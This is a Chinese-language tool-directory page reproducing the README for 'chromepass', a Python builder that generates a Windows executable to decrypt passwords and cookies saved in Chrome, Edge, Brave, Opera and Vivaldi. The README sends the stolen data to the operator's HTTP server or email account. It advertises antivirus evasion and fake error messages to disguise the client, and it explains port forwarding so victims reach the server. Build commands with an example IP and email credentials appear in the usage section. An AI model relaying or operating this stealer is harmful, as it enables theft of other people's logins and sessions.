Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
chromepass — Chromepass - 窃取 Chrome 保存的密码 | Kitploit
工具/GitHubGitHub/darkarp/chromepass
密码破解数据泄露钓鱼攻击红队
GitHubdarkarp/chromepass

chromepass

Chromepass - 窃取 Chrome 保存的密码

查看仓库
838111254年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Chromepass - 破解Chrome保存的密码和Cookie

Release Build Status on CircleCI
Scrutinizer代码质量(GitHub/Bitbucket)
GitHub issues GitHub closed issues

查看演示 · 报告Bug · 请求功能

目录

  • 关于项目
    • AV检测
  • 快速开始
    • 先决条件
    • 安装
  • 使用方法
  • 电子邮件
  • 错误、Bug和功能请求
  • 了解更多
  • 许可证
  • 演示

关于项目

Chromepass 是一个基于 Python 的控制台应用程序,可生成一个具有以下功能的 Windows 可执行文件:

  • 解密 Google Chrome、Chromium、Edge、Brave、Opera 和 Vivaldi 保存的密码和 Cookie
  • 远程发送包含登录名/密码组合和 Cookie 的文件(通过 HTTP 服务器或电子邮件)
  • 如果操作正确,可躲过 AV 检测
  • 自定义图标
  • 自定义错误消息
  • 自定义端口

AV检测!

新的客户端构建方法几乎可以保证 0% 的检测率,即使没有使用 AV 规避策略。如果将来此情况不再成立,将实施一些方法来提高 AV 规避能力。

最新扫描示例(注意:在 10-12 小时内,检测数从 0-2 增加到 32,请自行对构建进行分析):

  • VirusTotal 扫描 1
  • VirusTotal 扫描 2
  • VirusTotal 扫描 3
  • VirusTotal 扫描 4

快速开始

依赖与要求

这是一个非常简单的应用程序,仅使用:

  • Python - 已在 Python 3.9+ 上测试

建议在 Windows 虚拟机内进行安装。安装过程的某些部分可能受到现有配置的影响。本说明已在干净的 Windows 10 虚拟机上测试。

安装

Chromepass 需要 Windows 环境来编译!对 Linux 和 macOS 的支持可能会很快添加。

克隆仓库:

git clone https://github.com/darkarp/chromepass

注意:除了克隆仓库,你也可以下载最新版本,因为仓库可能更容易出现 Bug。

安装依赖项:

依赖项会自动检查并安装,因此你可以直接跳到使用方法。建议使用干净的虚拟机,以确保没有冲突。

如果你没有依赖项并且网络速度不快,这将需要一些时间。去喝杯咖啡吧。


使用方法

Chromepass 非常直接。首先运行:

python create.py -h

将显示选项列表,并且一目了然。

不传递任何参数将构建连接到 127.0.0.1 的服务器和客户端。

一个简单的构建示例:

python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

创建服务器和客户端后,请确保在客户端运行时服务器正在运行。

Cookie 和密码将保存到与服务器同目录下名为 data 的新文件夹中的 json 文件中,并按 IP 地址分开。


电子邮件

Chromepass 支持通过电子邮件发送文件,尽管该功能仍处于实验阶段。 要启用此功能,可以在创建服务器时使用 --email 标志。你需要两样东西:用户名(你的电子邮件)和密码(一个应用密码)。

要生成应用密码,你必须进入 账户设置 -> 安全 并启用两步验证(必需!)

启用两步验证后,你将看到一个新选项 应用密码: 两步验证

点击那里,然后选择适当的选项并生成密码: 两步验证

点击 生成 后,它将提供所需的密码。 你可以直接在命令中使用用户名和密码,也可以将其放入 config.ini 文件中,放在 YOUR_USERNAME 和 YOUR_PASSWORD 处。

在命令中包含凭据的示例

python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

如果你将凭据放入配置文件中(打开此文件就会看到位置)

python create.py --error --message 'An Error has happened' --email

远程注意事项

如果你想在远程场景中使用它,还必须进行端口转发(默认端口 80),以便受害者在运行客户端时能够连接到正确的端口上的服务器。
有关更多常规信息,请点击此处。如果仍有疑问,请进行谷歌搜索。


手动安装依赖项

自动设置是实验性的。由于某种原因,设置可能无法正确安装依赖项。如果是这种情况,你必须手动安装它们。
幸运的是,只有 2 个依赖项:

  • Microsoft Visual C++ 构建工具(使用推荐的工作负载安装)
  • Rustup

你也可以直接安装 Visual Studio 来代替构建工具,但这会占用更多空间。

成功安装构建工具后,只需从 Rustup 网站运行 rustup-init.exe 即可。

至此所需依赖项安装完成,你应该可以继续了。


错误、Bug和功能请求

如果你发现错误或 Bug,请将其报告为 Issue。 如果你想建议功能或改进,请在 Issue 页面中报告。

请在创建 Issue 时遵循显示的模板。


了解更多

要加入一个充满有抱负的计算机安全专家的社区,成员从完全初学者到经验丰富的专家, 请加入我们的 Discord 服务器:WhiteHat Hacking

如果你想联系我,可以通过:[email protected]


免责声明

我对你使用所提供信息和代码的行为概不负责。这仅供专业或教育目的使用。

许可证

AGPL-3.0


代码智能状态

演示

til

下载工具